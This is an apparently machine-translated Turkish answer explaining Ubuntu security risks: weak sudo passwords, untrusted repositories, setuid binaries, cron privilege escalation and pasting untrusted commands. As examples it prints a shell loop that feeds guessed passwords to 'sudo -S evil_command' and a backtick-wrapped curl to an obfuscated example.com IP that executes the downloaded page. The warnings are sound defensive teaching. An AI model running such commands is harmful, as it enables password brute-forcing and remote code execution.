Root şifresini kırmak mümkün değildir, çünkü Ubuntu varsayılan olarak root kullanıcısını devre dışı bırakmıştır. Bununla birlikte, kullanıcınız sudo ile kökleşebilirse ve şifrenizin tahmin edilmesi kolay / kaba kuvvet varsa, güvensiz bir sisteme sahipsiniz demektir. Bazı şifreleri test etmeye çalışan örnek komut dosyası:
#!/bin/sh
for pass in password 123 ubuntu pass; do
echo $pass|sudo -S evil_command
done
Güvenilmeyen bir havuz eklemek, bu havuzdaki programların kurulmasına izin verir. Açıkça benzeri bir uygulama sudo apt-get install [app-from-repo]kurmasanız bile, depo Ubuntu'nun havuzun belirli bir programın daha yeni bir sürümünü içerdiğine inanmasını sağlayarak diğer programları etkileyebilir.
Güncelleme işlemi root olarak çalıştırılır, aksi takdirde dosyalar /usr/binveya yazamadı /etc. Bir yükleme tetikleyicisi de root olarak çalıştırılır ve keyfi ve muhtemelen zararlı komutlar çalıştırabilir. Artık endişelenmeyin, programları güncellemek için manuel işlem gerekir ve Ubuntu depoları güvenlidir. Windows gibi kapalı kaynaklı yazılımlara hiçbir zaman tam olarak güvenilemez, çünkü kaynağı kötü amaçlı kod için kontrol edemezsiniz, ancak gerektiğinde (örneğin, sun-java6Flash veya benzeri özel programlar için geçerli değildir) Ubuntu uygulamasının kaynağını inceleyebilirsiniz .
Javier Rivera tarafından belirtildiği gibi, çekirdek hataları rasgele kod yürütülmesine neden olabilir, ancak bugged yazılımlar muhtemelen tehlikelidir, özellikle buggy setsuidroot ikili dosyaları (dosya sahibi, root altında çalışacak olan ikili dosyalar) ve root olarak çalışan diğer buggy programları.
Yaptığınız şeye dikkat etmezseniz, sisteminizde güvenlik delikleri oluşturabilirsiniz. Örneğin, cronjobs kavramını tam olarak anlamadan, /etc/cron.dailyana klasörünüzde bir program çalıştıran bir cronjob eklediniz (örn.. /bin/sh /home/your-username/myscript.shEğer myscript.sh dosyası sizin tarafınızdan yazılabilirse, bir istismar kötü niyetli olabilir) myscript.shroot olarak çalıştırılacak olan kod (ayrıcalık yükselmesi).
Güvende kalmak için aklını kullan! Ne yaptığını bilmiyorsanız, güvenilmeyen kaynaklardan gelen komutları çalıştırmayın. Birisi `curl 3221233674`sırt keneleri ile koş diyorsa , yapma. 3221233674 yazmanın başka bir yoludur 192.0.32.10(example.com'un IP adresi). Yani, eşit olacaktır:
`curl http://example.com/`
Bu geri tıklamalar çıktının kabuk komutları olarak yürütülmesine neden olur. Düz İngilizce olarak, " http://example.com/ sayfasını indirin ve indirilen sayfayı çalıştırmayı deneyin".
İlk başta, verilen komutta kötü amaçlı bir şey göremezsiniz. Ama şimdi, onun da kötüye kullanılabileceğini biliyorsun.
Internet gibi güvenilmeyen kaynaklardan aldığınız komutları / komut dosyalarını her zaman kontrol edin.